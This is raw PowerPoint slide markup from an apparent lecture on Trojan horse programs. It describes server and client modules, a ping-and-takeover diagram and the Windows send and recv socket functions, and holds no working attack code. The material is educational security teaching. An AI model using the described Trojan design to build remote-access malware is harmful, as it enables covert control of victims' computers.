            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-GB" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
              <a:ea typeface="+mn-ea"/>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rPr>
              <a:t>E-mail: fangtian.zhong@montana.edu</a:t>
            </a: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Trojan Horse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116330"/>
            <a:ext cx="11438255" cy="266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5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rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑 Light" charset="-122"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Trojan horse</a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t> program is a simple program made of two parts namely the server module and the client module. The server module, once installed in the victim’s computer secretly enables the attacker to access to all or part of victim’s (both hardware and software) resources. The attacker can use them via networks by means of the client module.</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4253865" y="3885565"/>
            <a:ext cx="3684270" cy="241808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20648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Procedure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075690"/>
            <a:ext cx="11438255" cy="396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200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5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rPr>
              <a:t>The server module is a program usually hidden into another regular program. Once this apparently harmless program has been executed at least once, it installs the server part of the Trojan horse program without the user knowing it.</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-533400">
              <a:lnSpc>
                <a:spcPts val="3200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>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rPr>
              <a:t>Once deliberately installed into the attacker’s computer, the client module first searches for remote computers (via a modified ping command) throughout the network. Then it takes control over them, once it has got the IP address and the port (TCP or UDP) of infected computers that can be remotely controlled.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="0" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="微软雅黑 Light" charset="-122"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="2378 [转换]"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect l="83472" t="9764" b="9896"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="412750" y="5040380"/>
            <a:ext cx="1202267" cy="1440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Procedure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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="电脑"/>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rcRect t="7800" b="7092"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="441325" y="1904365"/>
            <a:ext cx="3468370" cy="2952115"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="572770" y="5005070"/>
            <a:ext cx="3206750" cy="438150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="微软雅黑 Light" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="微软雅黑 Light" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>Module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="微软雅黑 Light" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>(Victim)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2300" b="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:ea typeface="微软雅黑 Light" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 7" descr="电脑"/>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8670925" y="1904365"/>
            <a:ext cx="2952115" cy="2952115"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="572770" y="5591810"/>
            <a:ext cx="3206750" cy="502285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="微软雅黑 Light" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>@IP 192.168.1.121</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2300" b="1">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:ea typeface="微软雅黑 Light" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8543925" y="5005070"/>
            <a:ext cx="3206750" cy="438150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="微软雅黑 Light" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>Client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="微软雅黑 Light" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>Module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="微软雅黑 Light" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>(Attacker)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2300" b="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:ea typeface="微软雅黑 Light" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4004310" y="1696085"/>
            <a:ext cx="4572000" cy="474980"/>
            <a:chOff x="6286" y="2671"/>
            <a:chExt cx="7200" cy="748"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7677" y="2671"/>
              <a:ext cx="5050" cy="748"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:no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300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                  <a:ea typeface="微软雅黑 Light" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                </a:rPr>
                <a:t>1.- ping 192.168.1.*</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="微软雅黑 Light" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="11" name="直接箭头连接符 10"/>
            <p:cNvCxnSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId11"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6286" y="3419"/>
              <a:ext cx="7200" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="31750" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:sysClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
              <a:tailEnd type="triangle" w="lg" len="lg"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3716020" y="3148330"/>
            <a:ext cx="5073650" cy="503555"/>
            <a:chOff x="5832" y="4958"/>
            <a:chExt cx="7990" cy="793"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="文本框 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId12"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5832" y="4958"/>
              <a:ext cx="7990" cy="732"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:no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300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                  <a:ea typeface="微软雅黑 Light" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                </a:rPr>
                <a:t>2.- pong 192.168.1.121 port 331337</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="微软雅黑 Light" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="14" name="直接箭头连接符 13"/>
            <p:cNvCxnSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId13"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6286" y="5751"/>
              <a:ext cx="7200" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="31750" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:sysClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
              <a:tailEnd type="triangle" w="lg" len="lg"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4004310" y="4210685"/>
            <a:ext cx="4572000" cy="474980"/>
            <a:chOff x="6286" y="6631"/>
            <a:chExt cx="7200" cy="748"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="文本框 15"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId14"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7200" y="6631"/>
              <a:ext cx="5050" cy="748"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:no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300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                  <a:ea typeface="微软雅黑 Light" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                </a:rPr>
                <a:t>3.- Takes control</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2300" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="微软雅黑 Light" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="直接箭头连接符 16"/>
            <p:cNvCxnSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId15"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6286" y="7379"/>
              <a:ext cx="7200" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="31750" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:sysClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
              <a:tailEnd type="triangle" w="lg" len="lg"/>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righ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send</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1485900" y="1162685"/>
            <a:ext cx="3139440" cy="2399665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>int WSAAPI send(</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SOCKET     s,</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const char *buf,</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int        len,</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int        flags</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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Box 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530225" y="3964305"/>
            <a:ext cx="9890125" cy="2014855"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>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s</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descriptor identifying a connected socket.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>:</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pointer to a buffer containing the data to be transmitted.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>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len</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length, in bytes, of the data in buffer pointed to by the buf parameter.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>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flags</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set of flags that specify the way in which the call is made. This parameter is constructed by using the bitwise OR operator with any of the following values.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text Box 30" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030352c5c2274656d706c61746549645c223a32303233313534347d220a7d0a"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5643245" y="1855470"/>
            <a:ext cx="5829300" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="720090" indent="-539750" algn="l" fontAlgn="auto">
              <a:buSzPct val="150000"/>
              <a:buBlip>
                <a:blip r:embed="rId4"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The send function sends data on a connected socket.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="圆角矩形标注 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5626100" y="1600200"/>
            <a:ext cx="5864225" cy="1525270"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -66101"/>
              <a:gd name="adj2" fmla="val -4204"/>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recv</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530225" y="3964305"/>
            <a:ext cx="9890125" cy="2014855"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>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s</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descriptor that identifies a connected socket.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>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[out] buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>:</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pointer to the buffer to receive the incoming data.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>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len</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length, in bytes, of the buffer pointed to by the buf parameter.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="10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[in] flags</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set of flags that influences the behavior of this function. See remarks below. See the Remarks section for details on the possible value for this parameter.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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933450" y="1162685"/>
            <a:ext cx="3139440" cy="2399665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>int recv(</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SOCKET s,</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[out] char   *buf,</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int    len,</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  [in]  int    flags</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
